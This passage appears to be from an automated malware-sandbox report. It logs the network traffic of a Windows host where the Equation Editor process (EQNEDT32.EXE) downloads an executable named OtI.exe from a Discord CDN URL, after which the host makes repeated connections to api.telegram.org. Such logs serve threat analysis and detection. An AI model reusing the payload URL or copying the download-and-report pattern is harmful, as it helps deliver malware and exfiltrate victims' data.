                                                                                          May 27, 2021 21:36:03.947418928 CEST44349185149.154.167.220192.168.2.22
                                                                                          May 27, 2021 21:36:03.947453022 CEST49185443192.168.2.22149.154.167.220
                                                                                          May 27, 2021 21:36:03.955586910 CEST44349185149.154.167.220192.168.2.22
                                                                                          May 27, 2021 21:36:03.955621004 CEST44349185149.154.167.220192.168.2.22
                                                                                          May 27, 2021 21:36:03.955676079 CEST49185443192.168.2.22149.154.167.220
                                                                                          May 27, 2021 21:36:03.989762068 CEST49185443192.168.2.22149.154.167.220
                                                                                          May 27, 2021 21:36:04.050311089 CEST44349185149.154.167.220192.168.2.22

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          May 27, 2021 21:33:12.801687002 CEST5219753192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:33:12.863409042 CEST53521978.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:33:12.871329069 CEST5309953192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:33:12.932205915 CEST53530998.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:33:12.932566881 CEST5309953192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:33:12.992825031 CEST53530998.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:34:25.681267023 CEST5283853192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:34:25.730848074 CEST53528388.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:34:34.886688948 CEST6120053192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:34:34.941498041 CEST53612008.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:34:37.736610889 CEST4954853192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:34:37.790215015 CEST53495488.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:34:40.809180021 CEST5562753192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:34:40.860954046 CEST53556278.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:34:40.861542940 CEST5562753192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:34:40.911649942 CEST53556278.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:34:44.372061014 CEST5600953192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:34:44.421977043 CEST53560098.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:34:46.855882883 CEST6186553192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:34:46.905687094 CEST53618658.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:34:46.906744003 CEST6186553192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:34:46.958024025 CEST53618658.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:34:53.915141106 CEST5517153192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:34:53.964751959 CEST53551718.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:34:53.965991020 CEST5517153192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:34:54.017172098 CEST53551718.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:34:57.252660990 CEST5249653192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:34:57.302594900 CEST53524968.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:34:57.303241968 CEST5249653192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:34:57.354302883 CEST53524968.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:34:59.870635033 CEST5756453192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:34:59.923515081 CEST53575648.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:34:59.924686909 CEST5756453192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:34:59.977488041 CEST53575648.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:35:05.929485083 CEST6300953192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:35:05.979440928 CEST53630098.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:35:05.980005980 CEST6300953192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:35:06.029865980 CEST53630098.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:35:06.140642881 CEST5931953192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:35:06.193989038 CEST53593198.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:35:06.205312967 CEST5931953192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:35:06.257755041 CEST53593198.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:35:11.961797953 CEST5307053192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:35:12.011553049 CEST53530708.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:35:12.012487888 CEST5307053192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:35:12.062032938 CEST53530708.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:35:14.046221972 CEST5977053192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:35:14.098134041 CEST53597708.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:35:18.023050070 CEST6152353192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:35:18.077311993 CEST53615238.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:35:18.078138113 CEST6152353192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:35:18.132361889 CEST53615238.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:35:19.000816107 CEST6279153192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:35:19.055226088 CEST53627918.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:35:19.761723042 CEST5066753192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:35:19.814244032 CEST53506678.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:35:20.533931971 CEST5412953192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:35:20.586390018 CEST53541298.8.8.8192.168.2.22
                                                                                          May 27, 2021 21:36:03.787713051 CEST6532953192.168.2.228.8.8.8
                                                                                          May 27, 2021 21:36:03.840274096 CEST53653298.8.8.8192.168.2.22

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                          May 27, 2021 21:33:12.801687002 CEST192.168.2.228.8.8.80xbcacStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:33:12.871329069 CEST192.168.2.228.8.8.80x6d9fStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:33:12.932566881 CEST192.168.2.228.8.8.80x6d9fStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:25.681267023 CEST192.168.2.228.8.8.80xb40Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:34.886688948 CEST192.168.2.228.8.8.80x57c5Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:37.736610889 CEST192.168.2.228.8.8.80x5bddStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:40.809180021 CEST192.168.2.228.8.8.80x1ad2Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:40.861542940 CEST192.168.2.228.8.8.80x1ad2Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:44.372061014 CEST192.168.2.228.8.8.80x8b62Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:46.855882883 CEST192.168.2.228.8.8.80xe94fStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:46.906744003 CEST192.168.2.228.8.8.80xe94fStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:53.915141106 CEST192.168.2.228.8.8.80x30b3Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:53.965991020 CEST192.168.2.228.8.8.80x30b3Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:57.252660990 CEST192.168.2.228.8.8.80xc77dStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:57.303241968 CEST192.168.2.228.8.8.80xc77dStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:59.870635033 CEST192.168.2.228.8.8.80xae74Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:59.924686909 CEST192.168.2.228.8.8.80xae74Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:35:05.929485083 CEST192.168.2.228.8.8.80x859fStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:35:05.980005980 CEST192.168.2.228.8.8.80x859fStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:35:06.140642881 CEST192.168.2.228.8.8.80xa8dbStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:35:06.205312967 CEST192.168.2.228.8.8.80xa8dbStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:35:11.961797953 CEST192.168.2.228.8.8.80x56d0Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:35:12.012487888 CEST192.168.2.228.8.8.80x56d0Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:35:14.046221972 CEST192.168.2.228.8.8.80x904aStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:35:18.023050070 CEST192.168.2.228.8.8.80x7a9Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:35:18.078138113 CEST192.168.2.228.8.8.80x7a9Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:35:19.000816107 CEST192.168.2.228.8.8.80xe23Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:35:19.761723042 CEST192.168.2.228.8.8.80x4ce6Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:35:20.533931971 CEST192.168.2.228.8.8.80x57fbStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:36:03.787713051 CEST192.168.2.228.8.8.80xfbb7Standard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                          May 27, 2021 21:33:12.863409042 CEST8.8.8.8192.168.2.220xbcacNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:33:12.863409042 CEST8.8.8.8192.168.2.220xbcacNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:33:12.863409042 CEST8.8.8.8192.168.2.220xbcacNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:33:12.863409042 CEST8.8.8.8192.168.2.220xbcacNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:33:12.863409042 CEST8.8.8.8192.168.2.220xbcacNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:33:12.932205915 CEST8.8.8.8192.168.2.220x6d9fNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:33:12.932205915 CEST8.8.8.8192.168.2.220x6d9fNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:33:12.932205915 CEST8.8.8.8192.168.2.220x6d9fNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:33:12.932205915 CEST8.8.8.8192.168.2.220x6d9fNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:33:12.932205915 CEST8.8.8.8192.168.2.220x6d9fNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:33:12.992825031 CEST8.8.8.8192.168.2.220x6d9fNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:33:12.992825031 CEST8.8.8.8192.168.2.220x6d9fNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:33:12.992825031 CEST8.8.8.8192.168.2.220x6d9fNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:33:12.992825031 CEST8.8.8.8192.168.2.220x6d9fNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:33:12.992825031 CEST8.8.8.8192.168.2.220x6d9fNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:25.730848074 CEST8.8.8.8192.168.2.220xb40No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:34.941498041 CEST8.8.8.8192.168.2.220x57c5No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:37.790215015 CEST8.8.8.8192.168.2.220x5bddNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:40.860954046 CEST8.8.8.8192.168.2.220x1ad2No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:40.911649942 CEST8.8.8.8192.168.2.220x1ad2No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:44.421977043 CEST8.8.8.8192.168.2.220x8b62No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:46.905687094 CEST8.8.8.8192.168.2.220xe94fNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:46.958024025 CEST8.8.8.8192.168.2.220xe94fNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:53.964751959 CEST8.8.8.8192.168.2.220x30b3No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:54.017172098 CEST8.8.8.8192.168.2.220x30b3No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:57.302594900 CEST8.8.8.8192.168.2.220xc77dNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:57.354302883 CEST8.8.8.8192.168.2.220xc77dNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:59.923515081 CEST8.8.8.8192.168.2.220xae74No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:34:59.977488041 CEST8.8.8.8192.168.2.220xae74No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:35:05.979440928 CEST8.8.8.8192.168.2.220x859fNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:35:06.029865980 CEST8.8.8.8192.168.2.220x859fNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:35:06.193989038 CEST8.8.8.8192.168.2.220xa8dbNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:35:06.257755041 CEST8.8.8.8192.168.2.220xa8dbNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:35:12.011553049 CEST8.8.8.8192.168.2.220x56d0No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:35:12.062032938 CEST8.8.8.8192.168.2.220x56d0No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:35:14.098134041 CEST8.8.8.8192.168.2.220x904aNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:35:18.077311993 CEST8.8.8.8192.168.2.220x7a9No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:35:18.132361889 CEST8.8.8.8192.168.2.220x7a9No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:35:19.055226088 CEST8.8.8.8192.168.2.220xe23No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:35:19.814244032 CEST8.8.8.8192.168.2.220x4ce6No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:35:20.586390018 CEST8.8.8.8192.168.2.220x57fbNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                          May 27, 2021 21:36:03.840274096 CEST8.8.8.8192.168.2.220xfbb7No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                                                          HTTP Request Dependency Graph

                                                                                          • cdn.discordapp.com

                                                                                          HTTP Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          0192.168.2.2249165162.159.130.23380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          May 27, 2021 21:33:13.036190987 CEST1OUTGET /attachments/843685789120331799/847476783744811018/OtI.exe HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Host: cdn.discordapp.com
                                                                                          May 27, 2021 21:33:13.114624023 CEST1INHTTP/1.1 301 Moved Permanently
                                                                                          Date: Thu, 27 May 2021 19:33:13 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: max-age=3600
                                                                                          Expires: Thu, 27 May 2021 20:33:13 GMT
                                                                                          Location: https://cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
                                                                                          cf-request-id: 0a50ea1ced00004e083f920000000001
                                                                                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=9FPirTMtsqE%2FExbLTXLPqS91dwoTKDHUuXspy8SeuppdTJcbMM%2BcYTrFLLsf44HKwfGg4fvfIPPXSE%2BVAM%2BDlXNqNmJnjX7p6Vs%2B82oE7FEyBHYlaGRC6uQnLwNd%2BWw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 6561ac74ac6c4e08-FRA
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          HTTPS Packets

                                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                          May 27, 2021 21:33:13.213546991 CEST162.159.130.233443192.168.2.2249166CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:46:39 CET 2020Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                          CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:46:39 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                          May 27, 2021 21:34:26.103579998 CEST149.154.167.220443192.168.2.2249167CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,036f7277af969a6947a61ae0b815907a1
                                                                                          CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                          CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                          OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                          May 27, 2021 21:34:35.070533991 CEST149.154.167.220443192.168.2.2249168CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,036f7277af969a6947a61ae0b815907a1
                                                                                          CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                          CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                          OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                          May 27, 2021 21:34:37.981861115 CEST149.154.167.220443192.168.2.2249169CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,036f7277af969a6947a61ae0b815907a1
                                                                                          CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                          CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                          OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                          May 27, 2021 21:34:41.024290085 CEST149.154.167.220443192.168.2.2249170CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,036f7277af969a6947a61ae0b815907a1
                                                                                          CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                          CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                          OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
